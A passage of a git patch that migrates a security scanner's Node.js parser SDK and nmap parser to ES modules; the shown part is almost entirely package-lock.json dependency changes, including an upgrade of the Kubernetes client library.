From 37e1972cc3a0decff49c182ae6a3861fd647f2d7 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 15 Jun 2025 21:39:13 +0200 Subject: [PATCH 001/137] Update parser-sdk & nmap parser to run using ESM Signed-off-by: Jannik Hollenbach --- parser-sdk/nodejs/package-lock.json | 2055 +++++++----------------- parser-sdk/nodejs/package.json | 5 +- parser-sdk/nodejs/parser-utils.js | 84 +- parser-sdk/nodejs/parser-wrapper.js | 113 +- scanners/nmap/parser/package-lock.json | 30 +- scanners/nmap/parser/package.json | 7 +- scanners/nmap/parser/parser.js | 11 +- scanners/nmap/parser/parser.test.js | 75 +- 8 files changed, 717 insertions(+), 1663 deletions(-) diff --git a/parser-sdk/nodejs/package-lock.json b/parser-sdk/nodejs/package-lock.json index ca6ddfa631..c844ac5d88 100644 --- a/parser-sdk/nodejs/package-lock.json +++ b/parser-sdk/nodejs/package-lock.json @@ -9,7 +9,7 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", @@ -18,37 +18,11 @@ "ws": "^8.13.0" } }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" - } - }, "node_modules/@jsep-plugin/assignment": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -60,6 +34,7 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -68,32 +43,70 @@ } }, "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", + "license": "Apache-2.0", "dependencies": { - "byline": "^5.0.0", + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, + "node_modules/@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", + "license": "MIT" + }, + "node_modules/@types/node": { + "version": "22.10.2", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", + "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", + "license": "MIT", + "dependencies": { + "undici-types": "~6.20.0" + } + }, + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "license": "MIT", + "dependencies": { + "@types/node": "*", + "form-data": "^4.0.0" + } + }, + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, + "node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "license": "MIT", "engines": { - "node": ">=14" + "node": ">= 14" } }, "node_modules/ajv": { @@ -140,148 +153,105 @@ } } }, - "node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, "node_modules/argparse": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "node_modules/asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" - } - }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, "node_modules/axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", + "integrity": "sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", + "license": "MIT", "dependencies": { "follow-redirects": "^1.15.6", "form-data": "^4.0.0", "proxy-from-env": "^1.1.0" } }, - "node_modules/axios/node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" - } + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true }, - "node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "node_modules/bare-fs": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.5.tgz", + "integrity": "sha512-1zccWBMypln0jEE05LzZt+V/8y8AQsQQqxtklqaIyg5nu6OAYFhZxPXinJTSG+kU5qyNmeLgcn9AW7eHiCHVLA==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "balanced-match": "^1.0.0" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" + }, + "engines": { + "bare": ">=1.16.0" + }, + "peerDependencies": { + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "license": "Apache-2.0", + "optional": true, "engines": { - "node": ">=0.10.0" + "bare": ">=1.14.0" } }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chownr": { + "node_modules/bare-path": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "bare-os": "^3.0.1" } }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "color-name": "~1.1.4" + "streamx": "^2.21.0" }, - "engines": { - "node": ">=7.0.0" + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", @@ -293,33 +263,21 @@ "node": ">= 0.8" } }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", + "license": "MIT", "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" + "ms": "^2.1.3" }, "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dependencies": { - "assert-plus": "^1.0.0" + "node": ">=6.0" }, - "engines": { - "node": ">=0.10" + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, "node_modules/delayed-stream": { @@ -330,47 +288,25 @@ "node": ">=0.4.0" } }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "license": "MIT", "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "once": "^1.4.0" } }, - "node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] - }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "license": "MIT" }, "node_modules/fast-uri": { "version": "3.0.3", @@ -396,129 +332,42 @@ } } }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "engines": { - "node": "*" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "node_modules/form-data": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.1.tgz", + "integrity": "sha512-tzN8e4TX8+kkxGPK8D5u0FNmjPUjw3lwC9lSLxxoB/+GtsJG91CO8bSWy73APlgAZzZbXEYZJuxjkHH2w+Ezhw==", + "license": "MIT", "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - }, - "bin": { - "glob": "dist/esm/bin.mjs" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "mime-types": "^2.1.12" }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", "engines": { - "node": ">=4" + "node": ">= 6" } }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": ">=6" - } - }, - "node_modules/har-validator/node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "node": ">=14" } }, - "node_modules/har-validator/node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" }, "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" + "node": ">= 12" } }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==" - }, "node_modules/isomorphic-ws": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", @@ -527,30 +376,10 @@ "ws": "*" } }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, "node_modules/jose": { "version": "5.9.6", "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true, "funding": { "url": "https://github.com/sponsors/panva" } @@ -567,37 +396,30 @@ } }, "node_modules/jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT" }, "node_modules/jsep": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", + "license": "MIT", "engines": { "node": ">= 10.16.0" } }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, "node_modules/json-schema-traverse": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, "node_modules/jsonpath-plus": { - "version": "10.2.0", - "resolved": 